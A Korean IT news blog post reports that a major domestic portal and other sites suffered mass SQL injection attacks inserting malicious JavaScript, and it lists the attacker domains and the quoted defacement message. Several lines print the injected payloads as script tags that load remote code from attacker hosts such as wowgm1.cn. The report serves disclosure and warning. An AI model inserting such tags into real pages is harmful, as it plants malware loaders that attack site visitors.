hack.jpg


국내 모 포털 일부 섹션이 SQL인젝션 공격으로 악성 자바스크립트가 무차별 삽입되는 공격을 당했다는 주장이 담긴 제보가 전문가로부터 또 다시 날아왔습니다.

현재 구글에서는 해당 포털의 악성코드가 확인이 안됩니다만, 이 분의 주장에 따르면 포털 웹페이지에서 확인이 가능하다고 합니다.


대형 포털 섹션 XXX에 들어가면 http://www.wowgm1.cn/m.js (클릭 금지) 이라는 페이지를 호출합니다. 이 페이지는 해당주소/0700*.htm 등 여러 htm 문서를 또 호출합니다.

호출되는 페이지의 내용은

This is a mass invasion. Safeguard the motherland's dignity! FUCK FRANCE! FUCK CNN! I WILL ATTACK you ALWAYS ! I love my motherland! sorry Please understand that I IF YOU WANT TO SAY SOMETHING . PLEASE SEND EMAIL TO kiss117276@163.com

입니다. 다른 페이지 감염 여부는 확인하지 못했습니다. <주요 실명 표현 삭제>

이는 제가 단독 분석한 앞선 기사의 연장선상에서 공격으로 파악됩니다.

UN-英정부도 한때 뚫렸다…개발코드 허점 때문
http://www.itviewpoint.com/56425

경찰서·지자체까지…그들은 해킹에 무기력했다
http://www.itviewpoint.com/56766

이 글에서 저는 <script src=nihaorr1.com/1.js></script> 형태의 DB 강제삽입 공격에 대해 소개한 바 있습니다. 당시 알려진 도메인은 nihaorr1.com , haoliuliang.net , 2117.net , 2117966.net 이었고, 악성코드 자바스크립트명은 0.js 1.js fuckjp.js 등이었습니다. 이에 미뤄 볼 때 동일한 공격 형태로 m.js를 뿌리는 것으로 보입니다.

제가 추가 취재해 본 결과

<script src=http://www.wowgm1.cn/m.js></script>
<script src=http://www.wowyeye.cn/m.js></script>
<script src=http://www.kisswow.com.cn/m.js></script>

등이 악성 코드로 뿌려진 상태입니다. 방송사부터 지방 단체까지 상당수가 이미 감염 됐다는 흔적이 보입니다.

관계 당국의 긴급 조치가 필요한 시점입니다.

이 게시물을...
Share
이 글과 가장 관련이 있는 글을 자동으로 추천해 드립니다

人터넷에서 놀자 카테고리의 다른 글

profile

안녕하세요. ITViewpoint 스타터이자 공동 에디터 '서명덕 기자' 입니다. 닉네임은 떡이떡이 입니다.

 

이 곳은 블로그미디어이며, 개인 공간은 http://itviewpoint.thoth.kr/ 을 메인으로 옮겨 갈 생각입니다.


개인적인 목적이라면 콘텐츠 막펌을 전면 허용 http://itviewpoint.com/blog/54971 합니다. 다만 비상업적인 용도에 한하며, 상업적인 용도라면 별도로 문의하세요. RSS http://itviewpoint.com/blog/rss 는 전문 제공합니다.